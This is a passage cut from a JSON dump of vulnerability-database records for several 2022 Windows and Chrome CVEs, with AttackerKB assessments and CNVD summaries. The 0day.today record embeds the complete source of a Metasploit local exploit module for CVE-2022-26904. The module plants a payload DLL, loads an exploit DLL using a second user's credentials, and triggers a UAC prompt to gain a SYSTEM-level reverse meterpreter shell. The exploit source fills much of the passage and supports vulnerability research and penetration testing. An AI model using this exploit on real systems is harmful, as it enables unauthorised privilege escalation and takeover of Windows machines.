"AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:35:19", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labeled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINIX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. 
When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. 
I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:36:02", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-1096", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-11-03T00:00:00", "id": "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "href": "https://attackerkb.com/topics/Jr4SM2pfMz/cve-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:29:08", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-24521.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-24481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-15T00:00:00", "id": "AKB:40A7EAF7-B14F-423F-9645-C4381123F28D", "href": "https://attackerkb.com/topics/8jIdAvrqnS/cve-2022-24481", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:35:04", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-24481.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-24521", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24481", "CVE-2022-24521"], "modified": "2022-04-15T00:00:00", "id": "AKB:157B4991-86A2-4A89-BD44-780E51F9FB80", "href": "https://attackerkb.com/topics/K2kXXKFdhh/cve-2022-24521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-27T18:33:40", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. 
Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n 
include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also correlate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. 
Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. 
Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major and minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= 
Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build 
detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! 
Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n 
print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n 
msiexec_pids = pidof('msiexec.exe')\n for id in msiexec_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n 3.times do\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-07T17:42:26", "description": "Microsoft Windows is a desktop operating system from Microsoft Corporation (USA), and a remote code execution vulnerability exists in Microsoft Windows Server Service. The vulnerability is caused by a flaw in the server service component. 
An attacker could exploit the vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Server Service Remote Code Execution Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-11-07T00:00:00", "id": "CNVD-2022-74597", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-74597", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T23:18:37", "description": "Microsoft Windows Kernel is the kernel of the Windows operating system from Microsoft Corporation (USA).Microsoft Windows Kernel is vulnerable to information disclosure. The vulnerability stems from errors in the configuration of the network system or product during operation. 
An attacker could use this vulnerability to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability (CNVD-2022-65612)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2022-09-26T00:00:00", "id": "CNVD-2022-65612", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-65612", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-09-11T03:54:32", "description": "Microsoft Remote Procedure Call Runtime is a technology used to create distributed client/server programs from Microsoft Corporation (USA). 
The vulnerability can be exploited to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24528"], "modified": 